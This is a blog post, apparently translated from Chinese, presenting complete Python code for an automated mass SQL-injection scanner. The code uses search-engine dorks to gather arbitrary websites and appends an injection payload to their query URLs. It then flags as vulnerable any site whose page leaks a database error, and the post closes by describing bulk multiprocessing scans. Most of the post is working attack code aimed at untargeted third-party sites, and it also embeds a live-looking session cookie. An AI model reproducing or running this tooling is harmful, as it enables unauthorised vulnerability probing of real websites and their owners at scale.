Preface:
A while back I found a SQL injection auto-scanner online called 傀儡扫描器 (the "puppet" scanner). It worked well, but it would pause inexplicably from time to time, so I decided to try writing a similar tool myself as Python practice (go easy on me, gurus 🤭).
Crawler
To find a lot of vulnerabilities we first need a lot of URLs to test, so we have to crawl for candidate sites. One way is to crawl Baidu search results for a keyword and then use XPath to extract the result links.
import re
import requests
import urllib3
from lxml import etree

# Silence the warning that verify=False would otherwise trigger on every request.
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)

def baidu_search(target, page):
    # Baidu paginates with pn in steps of 10 (page 0 -> pn=0, page 1 -> pn=10, ...).
    parment = {
        'wd': target,
        'pn': page * 10
    }
    url = "https://www.baidu.com/s?ie=utf-8&tn=SE_PSStatistics_p1d9m0nf&p_tk=5922EG4%2BtDYMH4cXzQyoeoiVui3lG1X%2BRvRh88szQUd4z99uxlCQ03vp7snTCsYJAxPvx4GsF6t4gqxT2Mxioj4XGndlZX1m%2Fi7cSnkGsZwvBwu3%2BrenWNED9IqLRGhWBBGz&p_timestamp=1605835171&p_signature=a9f4e7b5639627ec3a4934a1977e6e15"
    header = {
        'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:79.0) Gecko/20100101 Firefox/79.0',
        'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9',
        'cookie': 'BIDUPSID=F3EB4BA37D4753BF640A5ECA6D31240D; BAIDUID=05DC758E7BC482A1E483C1C9737176CA:FG=1; PSTM=1598272642; BD_UPN=13314752; ispeed_lsm=2; BDORZ=B490B5EBF6F3CD402E515D22BCDA1598; H_PS_PSSID=1464_33059_31660_32970_33098_33101_32962_26350; BDRCVFR[gltLrB7qNCt]=mbxnW11j9Dfmh7GuZR8mvqV; delPer=0; BD_CK_SAM=1; PSINO=5; H_PS_645EC=03b9lBvk8tC8aeNMx12CQ5pc6b5DiB6LyW5VHgdx10UKfBSq%2FrkohOHJCeT1hIjm6GC%2BVj3cFv2MvnjFVzz6; BA_HECTOR=a08l002g040h8ha1pl1fre6180q; kleck=9820b890c953eeae5f70c952f62a797d; COOKIE_SESSION=58510_0_7_6_6_9_0_1_6_4_0_0_59355_0_77_0_1605833867_0_1605833790%7C9%23156073_20_1605751873%7C9; BDRCVFR[t8qxwL5sMGc]=mk3SLVN4HKm; BDRCVFR[Fc9oatPmwxn]=mk3SLVN4HKm; rsv_jmp_slow=1605834338318; ZD_ENTRY=baidu'
    }
    test = requests.get(url, params=parment, headers=header)
    test.encoding = 'UTF-8'
    baidu = test.text
    print(test.url)
    # Pull the redirect link of every search result out of the page with XPath.
    html = etree.HTML(baidu)
    html_data = html.xpath('//*[@class="t"]/a/@href')
    for i in html_data:
        print(i)
    # Return the links so the next step can follow them.
    return html_data
This gets us links to the sites we want, but each link printed here is only a Baidu redirect link; we have to follow it once more before we reach the real site. So we issue another request and read the .url attribute of the response.
Second-pass crawl
This crawler obtains the real URL through target.url below.
def target_link(urls):
    url = urls
    header = {
        'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:79.0) Gecko/20100101 Firefox/79.0',
    }
    try:
        # Follow the Baidu redirect; the response's .url is the site's real address.
        target = requests.get(url, headers=header, timeout=5, verify=False)
        target_url = target.url
        with open('url.txt', 'a', encoding='UTF-8') as f:
            f.write(str(target_url))
            f.write('\n')
    except requests.RequestException:
        # Links that time out or otherwise fail are simply skipped.
        pass
This is the second pass over the redirect links scraped from Baidu in the first step: it resolves each one to the site's real URL and writes it to a file.
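To tie the two steps together, a driver loop along these lines would work. This is only a minimal sketch: the keyword, the number of pages, and the fact that baidu_search returns its extracted links are my additions, not part of the original tool.

keyword = 'inurl:asp?id='      # hypothetical example keyword, replace with your own
for page in range(5):          # crawl the first 5 result pages (assumed count)
    for link in baidu_search(keyword, page):
        target_link(link)      # resolve each redirect and append the real URL to url.txt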
Injection detection
Now the final step. Since this is only a simple injection check, we can send a single quote to make the site throw a database error, then match known error keywords in the response with regular expressions and report any hits.
def sql_check(url):
    # Only URLs with a query string (xx.xxx?xxx=xxx) are worth testing; skip the rest.
    if '?' not in url:
        print('error')
        return False
    # Append a payload containing an unbalanced single quote to provoke a database error.
    urls = url + "/**/and/**/'1'='2"
    r = requests.get(urls)
    response = r.text
    # Error signatures for common DBMSs (collected from the web).
    DBMS_ERRORS = {
        "MySQL": (r"SQL syntax.*MySQL", r"Warning.*mysql_.*", r"valid MySQL result", r"MySqlClient\."),
        "PostgreSQL": (r"PostgreSQL.*ERROR", r"Warning.*\Wpg_.*", r"valid PostgreSQL result", r"Npgsql\."),
        "Microsoft SQL Server": (
            r"Driver.* SQL[\-\_\ ]*Server", r"OLE DB.* SQL Server", r"(\W|\A)SQL Server.*Driver",
            r"Warning.*mssql_.*",
            r"(\W|\A)SQL Server.*[0-9a-fA-F]{8}", r"(?s)Exception.*\WSystem\.Data\.SqlClient\.",
            r"(?s)Exception.*\WRoadhouse\.Cms\."),
        "Microsoft Access": (r"Microsoft Access Driver", r"JET Database Engine", r"Access Database Engine"),
        "Oracle": (
            r"\bORA-[0-9][0-9][0-9][0-9]", r"Oracle error", r"Oracle.*Driver", r"Warning.*\Woci_.*",
            r"Warning.*\Wora_.*"),
        "IBM DB2": (r"CLI Driver.*DB2", r"DB2 SQL error", r"\bdb2_\w+\("),
        "SQLite": (
            r"SQLite/JDBCDriver", r"SQLite.Exception", r"System.Data.SQLite.SQLiteException",
            r"Warning.*sqlite_.*",
            r"Warning.*SQLite3::", r"\[SQLITE_ERROR\]"),
        "Sybase": (r"(?i)Warning.*sybase.*", r"Sybase message", r"Sybase.*Server message.*"),
    }
    # A hit on any signature means the page leaked a database error.
    for dbms, patterns in DBMS_ERRORS.items():
        for regex in patterns:
            if re.search(regex, response):
                print('Vulnerable: ' + url)
                with open('example.txt', 'a', encoding='UTF-8') as file:
                    file.write(str(url))
                    file.write('\n')
                # One match is enough; stop so the URL is not written more than once.
                return True
    return False
The '?' check at the top skips any URL that is not of the form xx.xxx?xxx=xxx, which saves time since there is nothing to inject into. The payload "/**/and/**/'1'='2" is then appended to the URL to make the site throw an error, the page content is fetched, and the DBMS_ERRORS signatures (borrowed from the web) are matched against it; any hit is printed and written to a file.
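As a rough usage sketch (my own glue code, not from the original post), the URLs collected in url.txt can then be fed to sql_check one by one:

# Hypothetical sequential driver: test every URL gathered by target_link.
with open('url.txt', 'r', encoding='UTF-8') as f:
    for line in f:
        sql_check(line.strip())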
Closing remarks
This has only been a quick sketch of how the tool works; the final version uses multiprocessing to speed things up and scan for vulnerabilities in bulk.
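The post does not show that part, but a minimal multiprocessing sketch might look like the following; the pool size of 8 and the overall structure are assumptions of mine, not the original implementation.

from multiprocessing import Pool

if __name__ == '__main__':
    # Hypothetical parallel version: spread sql_check across several worker processes.
    with open('url.txt', 'r', encoding='UTF-8') as f:
        urls = [line.strip() for line in f if line.strip()]
    with Pool(8) as pool:      # 8 workers is an assumed value, tune as needed
        pool.map(sql_check, urls)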
PS: the tool has been shared on CSDN and can be downloaded there. (There is a small bug at line 105 of the tool; you will need to debug it yourself.)